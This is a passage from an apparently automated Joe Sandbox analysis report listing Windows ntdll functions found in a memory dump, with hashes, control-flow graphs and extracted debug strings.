                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 60697513499f7c451f400f26ea672c4e8a180f84ecac61a13d9567f9ad931335
                                                              • Instruction ID: 19a89bde04716b86c5bac367146b4e5232ba0bf2b1d7711a18abc31c5bdb2b71
                                                              • Opcode Fuzzy Hash: 60697513499f7c451f400f26ea672c4e8a180f84ecac61a13d9567f9ad931335
                                                              • Instruction Fuzzy Hash: 7190023260650802D15471584418786001947D0301F95C096A0028614D875A8B5976A6
                                                              Function 35982BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 490b18ed7016ddf5e5579b4ceff88de9e6632d26cc7ebc17de0a6fefc49102b5
                                                              • Instruction ID: abadef8153583ea18a381cc5b5e1f05a4eb44b031767b00b7201eb4ca9be0c0b
                                                              • Opcode Fuzzy Hash: 490b18ed7016ddf5e5579b4ceff88de9e6632d26cc7ebc17de0a6fefc49102b5
                                                              • Instruction Fuzzy Hash: 0990023220250802D1847158440868A001947D1301FD5C09AA0029614DCA1A8B5D77A6
                                                              Function 35982BE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ff739f122117470e0fa066bd2ced2e0d34ed51b2e1c9112d5a661b558cbbda87
                                                              • Instruction ID: 8c1ea4dfc471c61af7aceeda4c899b0e24c59eab97cfd6eded2d7ce8b70e7f54
                                                              • Opcode Fuzzy Hash: ff739f122117470e0fa066bd2ced2e0d34ed51b2e1c9112d5a661b558cbbda87
                                                              • Instruction Fuzzy Hash: 8990023220654842D14471584408A86002947D0305F95C096A0068654D962A8E59B666
                                                              Function 35982B60 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e0776627345e0ee8b1866942684f03fb617e377f5d05409b4bec976348ea127f
                                                              • Instruction ID: 164e12513474d32b54cd4e4292f212ed5c4cac2b01736cabfb992caa46caed82
                                                              • Opcode Fuzzy Hash: e0776627345e0ee8b1866942684f03fb617e377f5d05409b4bec976348ea127f
                                                              • Instruction Fuzzy Hash: 0C90026220350003410971584418656401E47E0201B95C0A6E1018550DC52A8995612A
                                                              Function 35982AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f5fa68c764dac688fe49f67ee0275e3b78d3c067b265f33ff2411dd3b534b83
                                                              • Instruction ID: 338a73f72445b6a7e71f09ca3ba4cf3e9659f8bec554a5e56858476e4e3189c0
                                                              • Opcode Fuzzy Hash: 5f5fa68c764dac688fe49f67ee0275e3b78d3c067b265f33ff2411dd3b534b83
                                                              • Instruction Fuzzy Hash: D79002A2202640924504B2588408B4A451947E0201B95C09BE1058520CC52A8955913A
                                                              Function 35982AD0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c4e4c087a07a88e9697f7c54fb031c34f28482e08c440c0344de7dbd0d79e12f
                                                              • Instruction ID: 07cb7143d26ad086a5ba69d55f8dce2518963ec42b5d4d795fb88b3ca71eb709
                                                              • Opcode Fuzzy Hash: c4e4c087a07a88e9697f7c54fb031c34f28482e08c440c0344de7dbd0d79e12f
                                                              • Instruction Fuzzy Hash: 7E900226212500030109B5580708547005A47D5351395C0A6F1019510CD62689655126
                                                              Function 35982AF0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30e7e0465d724dd9529a09eeaec7996505adc1311a8df95d712b7118765b287a
                                                              • Instruction ID: f986da52ea2485bffe3cd78bd6db3cb66443146c35e7802d43d137957c98126e
                                                              • Opcode Fuzzy Hash: 30e7e0465d724dd9529a09eeaec7996505adc1311a8df95d712b7118765b287a
                                                              • Instruction Fuzzy Hash: 11900226222500020149B558060854B045957D63513D5C09AF141A550CC62689695326
                                                              Function 35982C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction ID: 307f61ed60840d1429457aee2b3d7f607b0016c023bd7bff015c29d3ac3a821a
                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction Fuzzy Hash:
                                                              Function 35982890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1126 35982890-359828b3 1127 359828b9-359828cc 1126->1127 1128 359ba4bc-359ba4c0 1126->1128 1130 359828dd-359828df 1127->1130 1131 359828ce-359828d7 1127->1131 1128->1127 1129 359ba4c6-359ba4ca 1128->1129 1129->1127 1132 359ba4d0-359ba4d4 1129->1132 1134 359828e1-359828e5 1130->1134 1131->1130 1133 359ba57e-359ba585 1131->1133 1132->1127 1135 359ba4da-359ba4de 1132->1135 1133->1130 1136 35982988-3598298e 1134->1136 1137 359828eb-359828fa 1134->1137 1135->1127 1138 359ba4e4-359ba4eb 1135->1138 1141 35982908-3598290c 1136->1141 1139 359ba58a-359ba58d 1137->1139 1140 35982900-35982905 1137->1140 1142 359ba4ed-359ba4f4 1138->1142 1143 359ba564-359ba56c 1138->1143 1139->1141 1140->1141 1141->1134 1144 3598290e-3598291b 1141->1144 1146 359ba50b 1142->1146 1147 359ba4f6-359ba4fe 1142->1147 1143->1127 1145 359ba572-359ba576 1143->1145 1148 359ba592-359ba599 1144->1148 1149 35982921 1144->1149 1145->1127 1151 359ba57c call 35990050 1145->1151 1153 359ba510-359ba536 call 35990050 1146->1153 1147->1127 1152 359ba504-359ba509 1147->1152 1157 359ba5a1-359ba5c9 call 35990050 1148->1157 1150 35982924-35982926 1149->1150 1154 35982928-3598292a 1150->1154 1155 35982993-35982995 1150->1155 1170 359ba55d-359ba55f 1151->1170 1152->1153 1153->1170 1159 3598292c-3598292e 1154->1159 1160 35982946-35982966 call 35990050 1154->1160 1155->1154 1163 35982997-359829b1 call 35990050 1155->1163 1159->1160 1167 35982930-35982944 call 35990050 1159->1167 1175 35982969-35982974 1160->1175 1163->1175 1167->1160 1172 35982981-35982985 1170->1172 1175->1150 1177 35982976-35982979 1175->1177 1177->1157 1178 3598297f 1177->1178 1178->1172
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: f418bd4363f7bfe4ed4eeb05234c499cc9f339997c43224d51e86fd4839e751c
                                                              • Instruction ID: 2da62e04de06b5fb19281212633610b5cf95fba1894c52b94e75a6f2ba2c45fc
                                                              • Opcode Fuzzy Hash: f418bd4363f7bfe4ed4eeb05234c499cc9f339997c43224d51e86fd4839e751c
                                                              • Instruction Fuzzy Hash: 7B5119B5A04216BFEF10CF98C98097EFBB8BB482407518169E465DB641D778EF50CBE0
                                                              Function 359F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1179 359f2410-359f2433 1180 359f24ec-359f24ff 1179->1180 1181 359f2439-359f243d 1179->1181 1183 359f2513-359f2515 1180->1183 1184 359f2501-359f250a 1180->1184 1181->1180 1182 359f2443-359f2447 1181->1182 1182->1180 1186 359f244d-359f2451 1182->1186 1185 359f2517-359f251b 1183->1185 1184->1183 1187 359f250c 1184->1187 1188 359f251d-359f252c 1185->1188 1189 359f2538-359f253e 1185->1189 1186->1180 1190 359f2457-359f245b 1186->1190 1187->1183 1191 359f252e-359f2536 1188->1191 1192 359f2540 1188->1192 1193 359f2543-359f2547 1189->1193 1190->1180 1194 359f2461-359f2468 1190->1194 1191->1193 1192->1193 1193->1185 1197 359f2549-359f2556 1193->1197 1195 359f246a-359f2471 1194->1195 1196 359f24b6-359f24be 1194->1196 1198 359f2484 1195->1198 1199 359f2473-359f247b 1195->1199 1196->1180 1202 359f24c0-359f24c4 1196->1202 1200 359f2558-359f2562 1197->1200 1201 359f2564 1197->1201 1204 359f2489-359f24ab call 35990510 1198->1204 1199->1180 1203 359f247d-359f2482 1199->1203 1205 359f2567-359f2569 1200->1205 1201->1205 1202->1180 1206 359f24c6-359f24ea call 35990510 1202->1206 1203->1204 1218 359f24ae-359f24b1 1204->1218 1208 359f258d-359f258f 1205->1208 1209 359f256b-359f256d 1205->1209 1206->1218 1211 359f25ae-359f25d0 call 35990510 1208->1211 1212 359f2591-359f2593 1208->1212 1209->1208 1214 359f256f-359f258b call 35990510 1209->1214 1225 359f25d3-359f25df 1211->1225 1212->1211 1216 359f2595-359f25ab call 35990510 1212->1216 1214->1225 1216->1211 1222 359f2615-359f2619 1218->1222 1225->1205 1226 359f25e1-359f25e4 1225->1226 1227 359f25e6-359f2610 call 35990510 1226->1227 1228 359f2613 1226->1228 1227->1228 1228->1222
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 02c34f44b83b0c6fd79a32a64d71ca107e5c0da5705c31ee261da06e68b04939
                                                              • Instruction ID: f22356fca91b3fef24c8f2b22bf5efb196d7733424ad0877ea7208d7da4d564e
                                                              • Opcode Fuzzy Hash: 02c34f44b83b0c6fd79a32a64d71ca107e5c0da5705c31ee261da06e68b04939
                                                              • Instruction Fuzzy Hash: 4851F675A04645AFDF20CF98CC90A7EB7FEAB48242B448459E495CB641DBB5EA40CB60
                                                              Function 35A1A670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1428 35a1a670-35a1a6e9 call 35952410 * 2 RtlDebugPrintTimes 1434 35a1a89f-35a1a8c4 call 359525b0 * 2 call 35984c30 1428->1434 1435 35a1a6ef-35a1a6fa 1428->1435 1437 35a1a724 1435->1437 1438 35a1a6fc-35a1a709 1435->1438 1439 35a1a728-35a1a734 1437->1439 1441 35a1a70b-35a1a70d 1438->1441 1442 35a1a70f-35a1a715 1438->1442 1443 35a1a741-35a1a743 1439->1443 1441->1442 1445 35a1a7f3-35a1a7f5 1442->1445 1446 35a1a71b-35a1a722 1442->1446 1447 35a1a745-35a1a747 1443->1447 1448 35a1a736-35a1a73c 1443->1448 1449 35a1a81f-35a1a821 1445->1449 1446->1439 1447->1449 1451 35a1a74c-35a1a750 1448->1451 1452 35a1a73e 1448->1452 1453 35a1a755-35a1a77d RtlDebugPrintTimes 1449->1453 1454 35a1a827-35a1a834 1449->1454 1457 35a1a86c-35a1a86e 1451->1457 1452->1443 1453->1434 1466 35a1a783-35a1a7a0 RtlDebugPrintTimes 1453->1466 1458 35a1a836-35a1a843 1454->1458 1459 35a1a85a-35a1a866 1454->1459 1457->1449 1462 35a1a845-35a1a849 1458->1462 1463 35a1a84b-35a1a851 1458->1463 1460 35a1a87b-35a1a87d 1459->1460 1464 35a1a870-35a1a876 1460->1464 1465 35a1a87f-35a1a881 1460->1465 1462->1463 1467 35a1a857 1463->1467 1468 35a1a96b-35a1a96d 1463->1468 1470 35a1a8c7-35a1a8cb 1464->1470 1471 35a1a878 1464->1471 1469 35a1a883-35a1a889 1465->1469 1466->1434 1476 35a1a7a6-35a1a7cc RtlDebugPrintTimes 1466->1476 1467->1459 1468->1469 1473 35a1a8d0-35a1a8f4 RtlDebugPrintTimes 1469->1473 1474 35a1a88b-35a1a89d RtlDebugPrintTimes 1469->1474 1472 35a1a99f-35a1a9a1 1470->1472 1471->1460 1473->1434 1479 35a1a8f6-35a1a913 RtlDebugPrintTimes 1473->1479 1474->1434 1476->1434 1481 35a1a7d2-35a1a7d4 1476->1481 1479->1434 1488 35a1a915-35a1a944 RtlDebugPrintTimes 1479->1488 1482 35a1a7f7-35a1a80a 1481->1482 1483 35a1a7d6-35a1a7e3 1481->1483 1487 35a1a817-35a1a819 1482->1487 1485 35a1a7e5-35a1a7e9 1483->1485 1486 35a1a7eb-35a1a7f1 1483->1486 1485->1486 1486->1445 1486->1482 1489 35a1a81b-35a1a81d 1487->1489 1490 35a1a80c-35a1a812 1487->1490 1488->1434 1494 35a1a94a-35a1a94c 1488->1494 1489->1449 1491 35a1a814 1490->1491 1492 35a1a868-35a1a86a 1490->1492 1491->1487 1492->1457 1495 35a1a972-35a1a985 1494->1495 1496 35a1a94e-35a1a95b 1494->1496 1497 35a1a992-35a1a994 1495->1497 1498 35a1a963-35a1a969 1496->1498 1499 35a1a95d-35a1a961 1496->1499 1500 35a1a987-35a1a98d 1497->1500 1501 35a1a996 1497->1501 1498->1468 1498->1495 1499->1498 1502 35a1a99b-35a1a99d 1500->1502 1503 35a1a98f 1500->1503 1501->1465 1502->1472 1503->1497
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: HEAP:
                                                              • API String ID: 3446177414-2466845122
                                                              • Opcode ID: c18274db37ee540bc14c846d4e7cff2183eade3ecefa30ec600ecad13842a6d4
                                                              • Instruction ID: 1831c9c773545b0f4e92ade7cac5ec5ae77877ffd4a0712e6a129d6729399314
                                                              • Opcode Fuzzy Hash: c18274db37ee540bc14c846d4e7cff2183eade3ecefa30ec600ecad13842a6d4
                                                              • Instruction Fuzzy Hash: 16A18875A083118FD705CE28C890E1ABBE6BF88354F054969ED56EB310EB70EE46DB91
                                                              Function 35977630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1504 35977630-35977651 1505 35977653-3597766f call 3594e660 1504->1505 1506 3597768b-35977699 call 35984c30 1504->1506 1511 35977675-35977682 1505->1511 1512 359b4638 1505->1512 1513 35977684 1511->1513 1514 3597769a-359776a9 call 35977818 1511->1514 1516 359b463f-359b4645 1512->1516 1513->1506 1520 35977701-3597770a 1514->1520 1521 359776ab-359776c1 call 359777cd 1514->1521 1518 359776c7-359776d0 call 35977728 1516->1518 1519 359b464b-359b46b8 call 359cf290 call 35989020 RtlDebugPrintTimes BaseQueryModuleData 1516->1519 1518->1520 1529 359776d2 1518->1529 1519->1518 1538 359b46be-359b46c6 1519->1538 1524 359776d8-359776e1 1520->1524 1521->1516 1521->1518 1531 359776e3-359776f2 call 3597771b 1524->1531 1532 3597770c-3597770e 1524->1532 1529->1524 1533 359776f4-359776f6 1531->1533 1532->1533 1536 35977710-35977719 1533->1536 1537 359776f8-359776fa 1533->1537 1536->1537 1537->1513 1540 359776fc 1537->1540 1538->1518 1541 359b46cc-359b46d3 1538->1541 1542 359b47be-359b47d0 call 35982c50 1540->1542 1541->1518 1543 359b46d9-359b46e4 1541->1543 1542->1513 1544 359b46ea-359b4723 call 359cf290 call 3598aaa0 1543->1544 1545 359b47b9 call 35984d48 1543->1545 1553 359b473b-359b476b call 359cf290 1544->1553 1554 359b4725-359b4736 call 359cf290 1544->1554 1545->1542 1553->1518 1559 359b4771-359b477f call 3598a770 1553->1559 1554->1520 1562 359b4781-359b4783 1559->1562 1563 359b4786-359b47a3 call 359cf290 call 359bcf9e 1559->1563 1562->1563 1563->1518 1568 359b47a9-359b47b2 1563->1568 1568->1559 1569 359b47b4 1568->1569 1569->1518
                                                              Strings
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 359B4725
                                                              • ExecuteOptions, xrefs: 359B46A0
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 359B4742
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 359B4787
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 359B4655
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 359B46FC
                                                              • Execute=1, xrefs: 359B4713
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: 83cabfca114f9ab8f29129784a3dbc03f173fdc8c4ec4d43eaae8f792c721285
                                                              • Instruction ID: 56954a4ea9e8910ec3f449fc630ca0160230b28361b85da869b94ea0eccb9093
                                                              • Opcode Fuzzy Hash: 83cabfca114f9ab8f29129784a3dbc03f173fdc8c4ec4d43eaae8f792c721285
                                                              • Instruction Fuzzy Hash: AD512475A00319BAEF10DBA4DC85FAE73BDBF44304F4400EAE509AB181EB71AA45CF55
                                                              Function 3595A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 359A7AE6
                                                              • Actx , xrefs: 359A7A0C, 359A7A73
                                                              • SsHd, xrefs: 3595A3E4
                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 359A79D0, 359A79F5
                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 359A79D5
                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 359A79FA
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                              • API String ID: 0-1988757188
                                                              • Opcode ID: cae114ecd9f5ca5366a5e4116c22b8e7dd1ec7aca31b87130dc74c2507af12fe
                                                              • Instruction ID: 0df1b61a3bcd2042e40ad6d2a3e7a266899930bf62413fcfb4c411f6feecf7c7
                                                              • Opcode Fuzzy Hash: cae114ecd9f5ca5366a5e4116c22b8e7dd1ec7aca31b87130dc74c2507af12fe
                                                              • Instruction Fuzzy Hash: A6E1F2756083028FE711CF24C894B1AB7E9BB84369F500E2EFD56CB290DB31D995CB96
                                                              Function 3595D770 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • Actx , xrefs: 359A9508
                                                              • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 359A9565
                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 359A9341, 359A9366
                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 359A9346
                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 359A936B
                                                              • GsHd, xrefs: 3595D874
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                              • API String ID: 3446177414-2196497285
                                                              • Opcode ID: 60b63f76f55b0258e8f7c26aafb46a9a4137ffdede3ddf0ebd35db5373e061e5
                                                              • Instruction ID: de6771520ff7d2168fa380b1958c0bdf39443a7e334c41b79875a07efa520d9a
                                                              • Opcode Fuzzy Hash: 60b63f76f55b0258e8f7c26aafb46a9a4137ffdede3ddf0ebd35db5373e061e5
                                                              • Instruction Fuzzy Hash: D9E1D5756083028FE710CF64C880B5AB7F9FF88368F454D6DE9968B281D771EA54CB92
                                                              Function 3593645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlDebugPrintTimes.NTDLL ref: 3593656C
                                                                • Part of subcall function 359365B5: RtlDebugPrintTimes.NTDLL ref: 35936664
                                                                • Part of subcall function 359365B5: RtlDebugPrintTimes.NTDLL ref: 359366AF
                                                              Strings
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 35999A2A
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 359999ED
